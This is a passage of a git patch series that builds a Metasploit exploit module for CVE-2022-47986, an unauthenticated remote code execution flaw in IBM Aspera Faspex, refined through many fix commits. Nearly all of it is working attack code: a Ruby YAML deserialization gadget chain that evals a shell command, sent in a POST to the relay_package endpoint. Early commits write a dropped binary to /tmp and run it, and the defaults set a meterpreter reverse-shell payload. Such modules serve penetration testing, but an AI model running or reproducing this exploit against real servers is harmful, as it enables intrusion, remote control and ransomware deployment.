From 7b777a88870c6b9ddca62e5ddd71376c06abc64b Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Thu, 9 Mar 2023 17:06:58 +0000 Subject: [PATCH 01/23] [exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization --- ..._aspera_faspex_rce_yaml_deserialization.rb | 143 ++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb new file mode 100644 index 000000000000..0da584f38639 --- /dev/null +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -0,0 +1,143 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::CheckModule + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability', + 'Description' => %q{ + This module exploit an unauthenticated RCE vulnerability + which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986). + }, + 'References' => [ + ['CVE', '2022-47986'], + ['URL', 'https://www.ibm.com/support/pages/node/6952319'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'], + ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'], + ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'], + ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'], + ], + 'Author' => [ + 'ohnonoyesyes' # POC + 'Maurice LAMBERT', # Metasploit auxiliary module + ], + 'DisclosureDate' => '', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], + 'DefaultOptions' => { + 'CheckModule' => '', + 'Action' => 'CHECK_RCE', + 'RPORT' => 443, + 'SSL' => true + }, + 'Targets' => [ + [ + 'Automatic (Dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X64, ARCH_X86], + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', + 'DisablePayloadHandler' => 'false' + } + } + ], + ], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + ) + ) + end + + def cmd_unix_generic? + datastore['PAYLOAD'] == 'cmd/unix/generic' + end + + def execute_command(command, _opts = {}) + exploit = %q# +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "pew" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:PrettyPrint + output: !ruby/object:Net::WriteAdapter + socket: &1 !ruby/module "Kernel" + method_id: :eval + newline: "throw `command`" + buffer: {} + group_stack: + - !ruby/object:PrettyPrint::Group + break: true + method_id: :breakable + #.gsub(/command/, command).gsub(/\n/, "\\n").gsub(/"/, "\\\"") + + payload = %q#{ + "package_file_list": [ + "/" + ], + "external_emails": exploit, + "package_name": "assetnote_pack", + "package_note": "hello from assetnote team", + "original_sender_name": "assetnote", + "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", + "metadata_human_readable": "Yes", + "forward": "pew", + "metadata_json": '{}', + "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", + "delivery_sender_name": "assetnote", + "delivery_title": "TEST", + "delivery_note": "TEST", + "delete_after_download": True, + "delete_after_download_condition": "IDK", +}#.gsub(/exploit/, exploit) + + response = send_request_raw({ + 'method' => "POST", + 'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'), + 'data' => payload, + }) + if response && response.body + return response.body + end + + false + end + + def exploit + file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}" + cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}" + + print_status(message("Sending #{datastore['PAYLOAD']} command payload")) + vprint_status(message("Generated command payload: #{cmd}")) + + execute_command(cmd) + + register_file_for_cleanup file_name + end +end From 5a5ac5755be63554b88a6a1b1244a8ba440f89dc Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Thu, 9 Mar 2023 18:57:01 +0000 Subject: [PATCH 02/23] Fix: exploit is a JSON string --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 0da584f38639..7fca413c6590 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -101,7 +101,7 @@ def execute_command(command, _opts = {}) "package_file_list": [ "/" ], - "external_emails": exploit, + "external_emails": "exploit", "package_name": "assetnote_pack", "package_note": "hello from assetnote team", "original_sender_name": "assetnote", From 50ca746e836ac78fdadebae9c9a7ae3f4e353b33 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 10 Mar 2023 22:24:42 +0000 Subject: [PATCH 03/23] Fix: syntax error --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 7fca413c6590..19826898f138 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -29,7 +29,7 @@ def initialize(info = {}) ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'], ], 'Author' => [ - 'ohnonoyesyes' # POC + 'ohnonoyesyes', # POC 'Maurice LAMBERT', # Metasploit auxiliary module ], 'DisclosureDate' => '', From 91a834f9c1b6116d2a46cd2658c7b7487c0c9d5b Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 10 Mar 2023 22:38:24 +0000 Subject: [PATCH 04/23] Fix: not implemented method --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 19826898f138..3ff9bfea08e1 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -133,8 +133,8 @@ def exploit file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}" cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}" - print_status(message("Sending #{datastore['PAYLOAD']} command payload")) - vprint_status(message("Generated command payload: #{cmd}")) + print_status("Sending #{datastore['PAYLOAD']} command payload") + vprint_status("Generated command payload: #{cmd}") execute_command(cmd) From 4382277207138c6496a45af9e186a9c835a890cd Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 10 Mar 2023 22:42:05 +0000 Subject: [PATCH 05/23] Fix: Payload JSON syntax --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 3ff9bfea08e1..8ceaafa70faf 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -108,13 +108,13 @@ def execute_command(command, _opts = {}) "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", - "metadata_json": '{}', + "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "assetnote", "delivery_title": "TEST", "delivery_note": "TEST", "delete_after_download": True, - "delete_after_download_condition": "IDK", + "delete_after_download_condition": "IDK" }#.gsub(/exploit/, exploit) response = send_request_raw({ From de886f28276fc974218786a5ed1bbd564a06e592 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 10 Mar 2023 22:47:00 +0000 Subject: [PATCH 06/23] Fix: JSON syntax --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 8ceaafa70faf..a07d84320dce 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -113,7 +113,7 @@ def execute_command(command, _opts = {}) "delivery_sender_name": "assetnote", "delivery_title": "TEST", "delivery_note": "TEST", - "delete_after_download": True, + "delete_after_download": true, "delete_after_download_condition": "IDK" }#.gsub(/exploit/, exploit) From ab0ad1939808c0ebc5a816d21041b6ae08ca835b Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 10 Mar 2023 22:56:58 +0000 Subject: [PATCH 07/23] Linting --- .../http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index a07d84320dce..5d45dde30fb2 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -32,7 +32,7 @@ def initialize(info = {}) 'ohnonoyesyes', # POC 'Maurice LAMBERT', # Metasploit auxiliary module ], - 'DisclosureDate' => '', + 'DisclosureDate' => '2023-02-02', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], @@ -95,7 +95,7 @@ def execute_command(command, _opts = {}) - !ruby/object:PrettyPrint::Group break: true method_id: :breakable - #.gsub(/command/, command).gsub(/\n/, "\\n").gsub(/"/, "\\\"") + #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"') payload = %q#{ "package_file_list": [ @@ -118,9 +118,9 @@ def execute_command(command, _opts = {}) }#.gsub(/exploit/, exploit) response = send_request_raw({ - 'method' => "POST", + 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'), - 'data' => payload, + 'data' => payload }) if response && response.body return response.body From 4b978b61e4744a72bef4e1a55506a0f1256fd4f5 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Thu, 16 Mar 2023 21:30:48 +0000 Subject: [PATCH 08/23] Remove unused function Co-authored-by: dwelch-r7 --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 5d45dde30fb2..98598c4ac51c 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -66,9 +66,6 @@ def initialize(info = {}) ) end - def cmd_unix_generic? - datastore['PAYLOAD'] == 'cmd/unix/generic' - end def execute_command(command, _opts = {}) exploit = %q# From 23add713d0ed3463d60808e851004be53762cd9b Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:16:15 +0000 Subject: [PATCH 09/23] Payload random values --- .../ibm_aspera_faspex_rce_yaml_deserialization.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 98598c4ac51c..6f429aa811cb 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -94,22 +94,23 @@ def execute_command(command, _opts = {}) method_id: :breakable #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"') + uuid = SecureRandom.uuid payload = %q#{ "package_file_list": [ "/" ], "external_emails": "exploit", "package_name": "assetnote_pack", - "package_note": "hello from assetnote team", - "original_sender_name": "assetnote", - "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", + "package_note": , + "original_sender_name": Rex::Text.rand_name(), + "package_uuid": uuid, "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", - "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", + "delivery_uuid": uuid, "delivery_sender_name": "assetnote", - "delivery_title": "TEST", - "delivery_note": "TEST", + "delivery_title": Rex::Text.rand_text_alphanumeric(4), + "delivery_note": Rex::Text.rand_text_alphanumeric(12), "delete_after_download": true, "delete_after_download_condition": "IDK" }#.gsub(/exploit/, exploit) From 82749ac7ad0599b6973d2735997ccf02b665ad26 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:28:59 +0000 Subject: [PATCH 10/23] Forgotten random value --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 6f429aa811cb..392561121467 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -101,7 +101,7 @@ def execute_command(command, _opts = {}) ], "external_emails": "exploit", "package_name": "assetnote_pack", - "package_note": , + "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15), "original_sender_name": Rex::Text.rand_name(), "package_uuid": uuid, "metadata_human_readable": "Yes", From 4b87070073ece60372a37caf5a66a6eb26abe364 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:30:35 +0000 Subject: [PATCH 11/23] Payload random value --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 392561121467..458297802c0e 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -108,7 +108,7 @@ def execute_command(command, _opts = {}) "forward": "pew", "metadata_json": "{}", "delivery_uuid": uuid, - "delivery_sender_name": "assetnote", + "delivery_sender_name": Rex::Text.rand_name(), "delivery_title": Rex::Text.rand_text_alphanumeric(4), "delivery_note": Rex::Text.rand_text_alphanumeric(12), "delete_after_download": true, From 918cddb66242938cc6ab3bc42ad161ca0d3bff3d Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:24:53 +0000 Subject: [PATCH 12/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 458297802c0e..7437d9258b43 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -17,8 +17,8 @@ def initialize(info = {}) info, 'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability', 'Description' => %q{ - This module exploit an unauthenticated RCE vulnerability - which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986). + This module exploits an unauthenticated YAML deserialization vulnerability + which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986). }, 'References' => [ ['CVE', '2022-47986'], From a26d38c3184624137c652f97d9c42db7691e414d Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:25:06 +0000 Subject: [PATCH 13/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 7437d9258b43..5825dc1d2b6f 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -26,7 +26,7 @@ def initialize(info = {}) ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'], ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'], ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'], - ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'], + ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'], ], 'Author' => [ 'ohnonoyesyes', # POC From 830905a3d47e85fee744730eacfda56398312ebe Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:25:38 +0000 Subject: [PATCH 14/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 5825dc1d2b6f..da89db714c41 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -37,8 +37,6 @@ def initialize(info = {}) 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], 'DefaultOptions' => { - 'CheckModule' => '', - 'Action' => 'CHECK_RCE', 'RPORT' => 443, 'SSL' => true }, From 4e8236d5c53d1de84a9aec6bf0736a700e9a1c9d Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:27:26 +0000 Subject: [PATCH 15/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index da89db714c41..0788a083837b 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -134,6 +134,5 @@ def exploit execute_command(cmd) - register_file_for_cleanup file_name end end From 0afbe404fb86129700fec11252dc1f20df264231 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:40:21 +0000 Subject: [PATCH 16/23] Fix: random UUID in the payload --- .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 0788a083837b..5f7912db3df5 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -111,7 +111,7 @@ def execute_command(command, _opts = {}) "delivery_note": Rex::Text.rand_text_alphanumeric(12), "delete_after_download": true, "delete_after_download_condition": "IDK" -}#.gsub(/exploit/, exploit) +}#.gsub(/exploit/, exploit).gsub(/uuid/, uuid) response = send_request_raw({ 'method' => 'POST', From ed9a98e6e81dfde0dfe22e74a2836e7de78f4f56 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:43:31 +0000 Subject: [PATCH 17/23] Fix: replace uuid string --- .../http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 5f7912db3df5..4b0738a09ddc 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -101,17 +101,17 @@ def execute_command(command, _opts = {}) "package_name": "assetnote_pack", "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15), "original_sender_name": Rex::Text.rand_name(), - "package_uuid": uuid, + "package_uuid": random_uuid, "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", - "delivery_uuid": uuid, + "delivery_uuid": random_uuid, "delivery_sender_name": Rex::Text.rand_name(), "delivery_title": Rex::Text.rand_text_alphanumeric(4), "delivery_note": Rex::Text.rand_text_alphanumeric(12), "delete_after_download": true, "delete_after_download_condition": "IDK" -}#.gsub(/exploit/, exploit).gsub(/uuid/, uuid) +}#.gsub(/exploit/, exploit).gsub(/random_uuid/, uuid) response = send_request_raw({ 'method' => 'POST', From d9fa3de136e90a8696885016d7a7fa20722a24d3 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 18:54:53 +0000 Subject: [PATCH 18/23] Use string interpolation --- ..._aspera_faspex_rce_yaml_deserialization.rb | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 4b0738a09ddc..849b7b7dead5 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -66,7 +66,7 @@ def initialize(info = {}) def execute_command(command, _opts = {}) - exploit = %q# + exploit = %Q( --- - !ruby/object:Gem::Installer i: x @@ -84,34 +84,34 @@ def execute_command(command, _opts = {}) output: !ruby/object:Net::WriteAdapter socket: &1 !ruby/module "Kernel" method_id: :eval - newline: "throw `command`" + newline: "throw `#{command}`" buffer: {} group_stack: - !ruby/object:PrettyPrint::Group break: true method_id: :breakable - #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"') + ).gsub(/\n/, '\n').gsub(/"/, '\"') uuid = SecureRandom.uuid - payload = %q#{ + payload = %Q({ "package_file_list": [ "/" ], - "external_emails": "exploit", + "external_emails": "#{exploit}", "package_name": "assetnote_pack", - "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15), - "original_sender_name": Rex::Text.rand_name(), - "package_uuid": random_uuid, + "package_note": "#{Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}", + "original_sender_name": "#{Rex::Text.rand_name()}", + "package_uuid": "#{uuid}", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", - "delivery_uuid": random_uuid, - "delivery_sender_name": Rex::Text.rand_name(), - "delivery_title": Rex::Text.rand_text_alphanumeric(4), - "delivery_note": Rex::Text.rand_text_alphanumeric(12), + "delivery_uuid": "#{uuid}", + "delivery_sender_name": "#{Rex::Text.rand_name()}", + "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}", + "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}", "delete_after_download": true, "delete_after_download_condition": "IDK" -}#.gsub(/exploit/, exploit).gsub(/random_uuid/, uuid) +}) response = send_request_raw({ 'method' => 'POST', From d05fcc0579c1850a798da8254868ea1acced68de Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 19:31:00 +0000 Subject: [PATCH 19/23] Use metasploit command stagers instead of custom payload --- ..._aspera_faspex_rce_yaml_deserialization.rb | 25 ++++++++----------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb index 849b7b7dead5..bbef8c80edc9 100644 --- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::FileDropper include Msf::Exploit::Remote::CheckModule include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager def initialize(info = {}) super( @@ -42,18 +43,20 @@ def initialize(info = {}) }, 'Targets' => [ [ - 'Automatic (Dropper)', + 'Unix Command', { - 'Platform' => 'linux', - 'Arch' => [ARCH_X64, ARCH_X86], - 'Type' => :linux_dropper, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', - 'DisablePayloadHandler' => 'false' + 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp', + 'RPORT' => 9000 } } ], ], + 'CmdStagerFlavor' => [ 'echo' ], + 'Payload' => { 'BadChars' => '`' }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], @@ -126,13 +129,7 @@ def execute_command(command, _opts = {}) end def exploit - file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}" - cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}" - - print_status("Sending #{datastore['PAYLOAD']} command payload") - vprint_status("Generated command payload: #{cmd}") - - execute_command(cmd) - + print_status('Exploiting...') + execute_cmdstager end end From d53994f9b5912333c9634a44a7507e07584aaa28 Mon Sep 17 00:00:00 2001 From: mauricelambert <50479118+mauricelambert@users.noreply.github.com> Date: Fri, 28 Apr 2023 20:50:14 +0000 Subject: [PATCH 20/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb Co-authored-by: 